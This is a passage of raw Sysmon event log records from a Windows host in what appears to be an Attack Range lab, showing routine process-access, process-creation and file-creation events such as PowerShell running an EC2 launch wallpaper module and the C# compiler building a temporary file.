13:30:25.623{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012462Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:25.623{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012461Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:25.623{08A6967A-4771-6000-3505-000000009A01}71207124C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{08A6967A-4771-6000-3605-000000009A01}7144C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000012460Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:25.626{08A6967A-4771-6000-3605-000000009A01}7144C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES4CAC.tmp" "c:\Users\Administrator\AppData\Local\Temp\taelik12\CSC7877A1367D12410296C9AD6E44969EE7.TMP"C:\Windows\system32\ATTACKRANGE\Administrator{08A6967A-4752-6000-9133-2D0000000000}0x2d33912HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{08A6967A-4771-6000-3505-000000009A01}7120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\taelik12\taelik12.cmdline" 10341000x800000000000000012459Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:25.435{08A6967A-476E-6000-3105-000000009A01}65806600C:\Windows\system32\conhost.exe{08A6967A-4771-6000-3505-000000009A01}7120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012458Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:25.435{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012457Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:25.435{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012456Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:25.435{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012455Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:25.435{08A6967A-4750-6000-0205-000000009A01}47883780C:\Windows\system32\csrss.exe{08A6967A-4771-6000-3505-000000009A01}7120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000012454Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:25.435{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012453Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:25.435{08A6967A-476E-6000-3205-000000009A01}66246808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{08A6967A-4771-6000-3505-000000009A01}7120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c242b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c18d9|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\fec023c8de0ed58c816cd442e3b4ddfe\Microsoft.PowerShell.Commands.Utility.ni.dll+ffb6fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\fec023c8de0ed58c816cd442e3b4ddfe\Microsoft.PowerShell.Commands.Utility.ni.dll+ffb6fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+6720377c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+671df555|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+671df226|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+67c90b0b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+6719fdbc|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+671fe28b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+671e18f0|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+671e18f0|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+671e1a69|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll+46fc1 154100x800000000000000012452Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:25.411{08A6967A-4771-6000-3505-000000009A01}7120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\taelik12\taelik12.cmdline"C:\Windows\system32\ATTACKRANGE\Administrator{08A6967A-4752-6000-9133-2D0000000000}0x2d33912HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{08A6967A-476E-6000-3205-000000009A01}6624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -NoLogo -WindowStyle hidden -ExecutionPolicy Unrestricted "Import-Module "C:\ProgramData\Amazon\EC2-Windows\Launch\Module\Ec2Launch.psd1"; Set-Wallpaper -Initial" 11241100x800000000000000012451Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:25.404{08A6967A-476E-6000-3205-000000009A01}6624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\taelik12\taelik12.cmdline2021-01-14 13:30:25.404 11241100x800000000000000012450Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:30:25.404{08A6967A-476E-6000-3205-000000009A01}6624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\taelik12\taelik12.dll2021-01-14 13:30:25.404 10341000x800000000000000012480Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:26.498{08A6967A-4288-6000-1100-000000009A01}11921988C:\Windows\system32\svchost.exe{08A6967A-476E-6000-3205-000000009A01}6624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012479Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:26.498{08A6967A-4288-6000-1100-000000009A01}11921988C:\Windows\system32\svchost.exe{08A6967A-476E-6000-3205-000000009A01}6624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012504Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:27.888{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012503Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:27.873{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012502Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:27.873{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012501Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:27.873{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012500Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:27.873{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012499Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:27.873{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012498Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:27.857{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows